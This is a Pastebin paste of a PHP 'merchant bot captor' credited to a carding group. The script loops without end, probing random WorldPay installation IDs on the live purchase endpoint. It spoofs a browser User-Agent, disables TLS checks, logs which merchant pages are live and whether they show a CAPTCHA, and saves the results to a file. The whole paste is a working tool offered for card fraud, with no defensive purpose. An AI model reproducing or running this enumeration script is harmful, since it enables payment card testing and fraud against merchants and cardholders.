Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /***************************************************
- * ->> HHHHHAMMER WORLDPAY MERCHANT BOT CAPTOR <<__
- * Created by N1ghtm4R3 (@MrBanker)
- * Released _Date: 03/02/2018
- *
- * Powered by PerfectCarders
- * https://t.me/PerfectCarders
- ****************************************************/
- ini_set("max_execution_time", 0);
- ini_set("memory_limit", "-1");
- // bot config;
- $valor = "1.00"; // valor estatico || money;
- $moeda = "GBP"; // codigo iso moeda // currency;
- $oneLive = false; // true para parar o bot quando sair a primeira LIVE;
- $dirLive = dirname(__FILE__) . "/WorldPay_LIVE_1_ao_999999.txt"; // caminho das LIVES;
- print "\n###############################################";
- print "\n# >>>>>.HAMMER WORLDPAY MERCHANT BOT CAPTOR v1.1";
- print "\n# Created by Mr. Banker - PerfectCarders";
- print "\n###############################################\n";
- print "*** Aguarde...\n\n";
- ob_start();
- for($i=0; $i = 1; $i++){
- $id = mt_rand(1, 499999);
- $url = "https://secure.worldpay.com/wcc/purchase?instId=".$id."&testMode=0&cartId=1¤cy=".$moeda."&amount=".$valor."";
- $ch = curl_init();
- curl_setopt($ch, CURLOPT_URL, $url);
- cURL_Setup($ch);
- $output = curl_exec($ch);
- $chInfo = curl_getinfo($ch);
- curl_close($ch);
- if(!$chInfo["http_code"] != "200"){
- if(strpos($output, "NAME=PaymentID") !== false){
- if(strpos($output, "recaptcha") !== false){
- $captcha = "FOUND!";
- }else{
- $captcha = "NOT FOUND!";
- }
- $live = "[+] STATUS: ".$chInfo["http_code"]." LIVE! => ".$chInfo["url"]."|CAPTCHA: $captcha";
- $fp = fopen($dirLive, "a+");
- fwrite($fp, $live . PHP_EOL);
- fclose($fp);
- print $live."\n";
- if($oneLive){ break; }
- }else{
- print "[-] STATUS: ".$chInfo["http_code"]." DIE! => ".$chInfo["url"]."\n";
- }
- }else{
- print "[!] STATUS: ".$chInfo["http_code"]." => FALHA NA CONECXAO! RECONECTANDO EM 3 SEG...\n";
- sleep(3);
- continue;
- }
- ob_flush();
- flush();
- }
- ob_end_flush();
- function cURL_Setup($set)
- {
- curl_setopt($set, CURLOPT_HTTPHEADER,
- array(
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
- "Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3",
- "Connection: keep-alive"
- ));
- curl_setopt($set, CURLOPT_SSL_VERIFYPEER, false);
- curl_setopt($set, CURLOPT_SSL_VERIFYHOST, false);
- curl_setopt($set, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($set, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($set, CURLOPT_TIMEOUT, 20);
- }
- ?>
Add Comment
Please, Sign In to add comment